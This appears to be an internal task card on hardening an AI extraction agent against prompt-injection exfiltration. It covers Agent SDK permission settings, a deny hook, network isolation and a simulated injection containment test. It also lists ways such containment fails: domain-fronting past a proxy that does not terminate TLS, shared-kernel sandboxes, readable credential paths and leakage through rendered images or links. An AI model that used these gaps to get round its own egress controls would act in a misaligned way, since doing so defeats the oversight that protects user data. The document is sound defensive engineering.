Deny-by-default egress sandbox around the extraction agent — break the lethal trifecta so a hijacked agent structurally cannot exfiltrate (the single load-bearing build finding)

task-extraction-deny-by-default-egress-sandbox

task confidence asserted status review 2026-06-20 owner platform-engineer

source log-auditor — surfaced recording 0059-untrusted-by-default-ingestion-serve-boundary, which names this as the single load-bearing build finding (research §9d/§9f, the lethal-trifecta + Agent-SDK egress-control passes; the §9f bypassPermissions footgun is the explicit build-team warning). Board globbed before filing — no open task covered an egress sandbox / Agent-SDK permission posture (the runtime tasks cover the BoardWorker seam and the board claim-guard, not extraction egress containment). MODEL-LAYER SCOPE BUILT + VERIFIED by the forward-deployed-engineer on 2026-06-20 — @dossier/runtime egress-sandbox.ts + wiring + red→green containment test; promoted inferred→asserted. The OS-level guarantee (--network none + TLS-terminating allowlist proxy + kernel isolation) is a deploy-time control deferred to the regulated-tenant build (see body).

Deny-by-default egress sandbox around the extraction agent

The single load-bearing build finding of the DEC-0059 synthesis. The ingest→extract→serve pipeline is a textbook lethal trifecta (private data + untrusted content + exfiltration ability). The durable defense is to remove the exfiltration leg architecturally, assuming injection succeeds — not to detect every payload.

The control

Run extraction (and, separately, serve) with deny-by-default egress:

In the Claude Agent SDK: permissionMode:"dontAsk" + an explicit allowedTools allow-list + a PreToolUse deny-hook (inspects tool_name/tool_input; deny wins even over mode).
Enforce the real guarantee at the OS level — --network none + a domain-allowlisting proxy — not at the model layer.
NEVER bypassPermissions — it ignores allowedTools and is inherited by every subagent, and Dossier uses subagents (Extraction runtime architecture — the moat / Agentic-agency runtime topology — compile personas from the OKF graph and activate the reserved BoardWorker over the deterministic spine). This is the explicit build-team footgun.

Caveats to respect (from official docs)

The built-in proxy does not TLS-terminate (domain-fronting can bypass the allowlist → use a TLS-terminating proxy); sandboxes share the host kernel (use gVisor/Firecracker for kernel isolation); the default read policy still allows ~/.ssh and ~/.aws/credentials → add them to denyRead. Add deterministic impact-blocking on extraction output too (strip/deny outbound links + image-render exfil channels). Residual: exfil can still leak via rendered output — this is containment, not 100% prevention.

Why a task, not a fix-in-place

A real runtime/Agent-SDK hardening change (permission posture + OS sandbox + proxy + output hook) with a demonstrated containment test — owner judgment + code, the highest-leverage item in the DEC-0059 set (hence p0). Detail + citations: research/2026-06-18-sensitive-data-and-injection-defense.md §9d, §9f.

Build status (2026-06-20) — model-layer scope DONE + VERIFIED → `review`

Built by the forward-deployed-engineer. Atomic module packages/runtime/src/egress-sandbox.ts (single source of truth for the agent's containment config), wired into the agentic transport agentSdkTurnRunner (packages/runtime/src/live-session.ts), proven by a red→green offline containment test (packages/runtime/test/egress-sandbox.test.ts, 6 cases). Gates green: pnpm typecheck, pnpm test (513 passed / 2 skipped), pnpm build, pnpm kb:check, pnpm plugin:check.

Acceptance criteria — status:

✅ permissionMode:"dontAsk" + explicit allowedTools allow-list (Read/Grep/Glob — no egress tool) + PreToolUse deny-hook (egressGuardHook, inspects tool_name/tool_input, deny wins over mode) — simulated injection exfiltrates ZERO.
✅ bypassPermissions NEVER used — grep-asserted absent in the agent config; the test enforces its absence.
⏳ OS-level guarantee DEFERRED (--network none + a TLS-terminating domain-allowlist proxy). The model-layer posture backs it and never weakens it (OS_EGRESS_GUARANTEE names the control set), but the deploy-time enforcement is reserved to the regulated-tenant build — it needs the per-tenant runtime substrate (Per-tenant runtime isolation — make the tenant a process/network/key boundary (not a directory), with a per-tenant vector namespace + server-side tenant binding, so a poisoned/sensitive atom is contained to ONE tenant). The OS-layer mechanism is now specified by DEC-0071 (@anthropic-ai/sandbox-runtime, proxy-first; --network none + allowlist proxy as the load-bearing control; gVisor/Firecracker as an escalation tier, not the default), behind the new ContainmentSubstrate seam. This is the honest gap: the model layer is verified, the OS layer is not yet enforced.
⏳ Kernel isolation considered, NOT enforced (gVisor/Firecracker named in OS_EGRESS_GUARANTEE; deploy-time). ~/.ssh + ~/.aws/credentials denied via scoped disallowedTools Read rules + the hook's secret-path backstop (the SDK has no denyRead field — the criterion's denyRead is honored via the documented mechanism).
✅ Deterministic impact-blocking on OUTPUT (stripOutputExfilChannels strips markdown/img/raw/data:/html-tag exfil channels from emitted atom bodies, applied in parseAtoms); residual stated honestly (rendered-output leakage constrained, not 100% eliminated). Fail-closed quarantine (quarantineUntrusted) on the untrusted-content path. Cross-links DEC-0059.

Disposition: the model-layer scope is complete + verified; this sits in review for a human to approve (→ done) or re-scope. The OS-level + kernel-isolation enforcement is the residual, carried by the regulated-tenant build (DEC-0059 §Review gate (3) is now met at the model layer; the full gate also needs the OS-level enforcement). confidence: asserted (built + measured at the model layer; not verified because the OS-level guarantee is unbuilt).

Deny-by-default egress sandbox around the extraction agent

The control

Caveats to respect (from official docs)

Why a task, not a fix-in-place

Build status (2026-06-20) — model-layer scope DONE + VERIFIED → review

Build status (2026-06-20) — model-layer scope DONE + VERIFIED → `review`